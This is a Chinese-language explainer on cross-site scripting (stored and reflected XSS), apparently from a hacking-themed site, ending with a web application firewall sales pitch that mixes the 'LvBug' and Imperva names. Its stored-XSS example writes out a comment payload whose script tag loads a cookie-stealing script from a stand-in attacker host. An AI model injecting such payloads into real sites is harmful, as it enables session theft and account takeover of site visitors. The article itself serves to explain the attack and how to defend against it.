[ 首页 ] [ 渗透测试 ] [ 黑客接单 ] [ 黑客技术 ] [ 黑客论坛 ] [ 黑客松 ]



标题 : 跨站脚本 (XSS) 攻击
日期 : 2023-07-31

什么是跨站脚本攻击(XSS)

跨站脚本 (XSS) 是一种常见的攻击媒介,它将恶意代码注入易受攻击的 Web 应用程序中。XSS 与其他 Web 攻击媒介(例如 SQL注入)不同,因为它不直接针对应用程序本身。相反,网络应用程序的用户才是面临风险的人。

成功的跨站点脚本攻击可能会对在线企业的声誉及其与客户的关系产生毁灭性的后果。

根据攻击的严重程度,用户帐户可能会被泄露,木马程序可能会被激活,页面内容可能会被修改,从而误导用户自愿交出其私人数据。最后,会话 cookie 可能会被泄露,从而使犯罪者能够冒充有效用户并滥用他们的私人帐户。

跨站脚本攻击可以分为两种类型:存储型和反射型。

存储型 XSS,也称为持久型 XSS,是两者中破坏性更大的一个。当恶意脚本直接注入易受攻击的 Web 应用程序时,就会发生这种情况。

反射型 XSS 涉及将 Web 应用程序中的恶意脚本反射到用户的浏览器上。该脚本嵌入到链接中,并且仅在单击该链接后才会激活。

什么是存储跨站脚本

为了成功执行存储型 XSS 攻击,犯罪者必须找到Web 应用程序中的漏洞,然后将恶意脚本注入其服务器(例如,通过评论字段)。

最常见的目标之一是允许用户共享内容的网站,包括博客、社交网络、视频共享平台和留言板。每次查看受感染的页面时,恶意脚本都会传输到受害者的浏览器。

存储型XSS攻击示例

在浏览电子商务网站时,犯罪者发现了一个允许 HTML 标签嵌入网站评论部分的漏洞。嵌入的标签成为页面的永久特征,导致浏览器在每次打开页面时使用其余源代码来解析它们。

攻击者添加了以下评论: 物美价廉!在这里阅读我的评论 <script src=”http://hackersite.com/authstealer.js”> </script>。

从此时起,每次访问该页面时,注释中的 HTML 标记都会激活一个 JavaScript 文件,该文件托管在另一个站点上,并且能够窃取访问者的会话 cookie。

使用会话 cookie,攻击者可以破坏访问者的帐户,使他能够轻松访问其个人信息和信用卡数据。与此同时,访问者可能从未向下滚动到评论部分,因此并不知道攻击发生了。

与点击链接后激活脚本的反射攻击不同,存储攻击只需要受害者访问受感染的网页。这增加了攻击的范围,危及所有访客,无论他们的警惕程度如何。

从犯罪者的角度来看,持续性 XSS 攻击相对更难执行,因为很难定位被流量的网站和存在可实现永久脚本嵌入的漏洞的网站。

存储型 XSS 攻击预防/缓解

Web 应用程序防火墙 (WAF) 是防御 XSS 和 Web 应用程序攻击的最常用解决方案。

WAF 采用不同的方法来应对攻击媒介。就 XSS 而言,大多数将依赖基于签名的过滤来识别和阻止恶意请求。

根据行业最佳实践,LvBug的云 Web应用防火墙 还采用签名过滤来对抗跨站点脚本攻击。

LvBug云 WAF 作为托管服务提供,由道德黑客安全专家团队定期维护,他们不断使用新发现的攻击向量签名更新安全规则集。

Imperva 众包技术自动收集和聚合整个网络的攻击数据,以造福所有客户。

众包方法可以对零日威胁做出极其快速的响应,一旦识别出单一攻击企图,就可以保护整个用户社区免受任何新的威胁。

众包还可以使用 IP 声誉系统来阻止重复犯罪者,包括往往被多个犯罪者重复使用的僵尸网络资源